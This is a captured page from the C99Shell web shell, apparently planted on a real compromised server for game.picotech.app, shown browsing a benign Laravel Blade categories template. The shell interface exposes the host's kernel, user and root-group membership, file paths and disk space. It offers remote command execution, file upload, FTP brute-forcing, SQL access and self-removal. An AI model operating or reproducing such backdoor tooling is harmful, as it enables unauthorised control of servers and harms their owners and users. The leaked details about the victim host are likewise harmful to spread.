!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/game.picotech.app/public_html/core/resources/views/user/category/   drwxr-xr-x
Free 28.74 GB of 117.98 GB (24.36%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.blade.php (4.01 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('master.front')
@section('title')
    {{__('Categories')}}
@endsection

@section('content')


    <div class="container mt-5 mb-5">
        <div class="row">
            <div class="col-12">
                <!-- Page Title-->
                <div class="page-title">
                    <div class="container">
                        <div class="row">
                            <div class="col-lg-12">
                                <ul class="breadcrumbs">
                                    <li><a href="{{route('front.index')}}">{{__('Home')}}</a> </li>
                                    <li class="separator"></li>
                                    <li>{{__('Categories')}}</li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </div>
                <!-- Page Content-->
                <div class="container-fluid padding-bottom-3x mb-1">
                    <div class="row">
                        @include('includes.user_sitebar')
                        <div class="col-lg-9 col-12 new_user_profile mt-3">
                            <div class="card">
                                <div class="card-body">
                                    <h5>
                                        {{__('Categories')}}
                                    </h5>
                                    <div class="u-table-res">
                                        <table class="table table-bordered mb-0">
                                            <thead>
                                            <tr>
                                                <th>{{__('Image')}}</th>
                                                <th>{{__('Name')}}</th>
                                                <th>{{__('Status')}}</th>
                                            </tr>
                                            </thead>
                                            <tbody>
                                            @if($categories->isNotEmpty())
                                                @foreach ($categories as $category)
                                                    <tr>
                                                        <td>
                                                            <img width="60" height="40" src="{{ $category->photo ? asset('assets/images/'.$category->photo) : asset('assets/images/placeholder.png') }}" alt="Image Not Found">
                                                        </td>
                                                        <td>{{$category->name}}</td>
                                                        <td>
                                                            <span>{{$category->status}}</span>
                                                        </td>
                                                    </tr>
                                                @endforeach
                                            @else
                                                <tr class="text-center">
                                                    <td colspan="6"> No Data Available</td>
                                                </tr>
                                            @endif
                                            </tbody>
                                        </table>

                                        <div class="row">
                                            <div class="col-md-12 mt-2">
                                                <div class="text-right float-right">
                                                    {!! $categories !!}
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>


@endsection


:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0045 ]--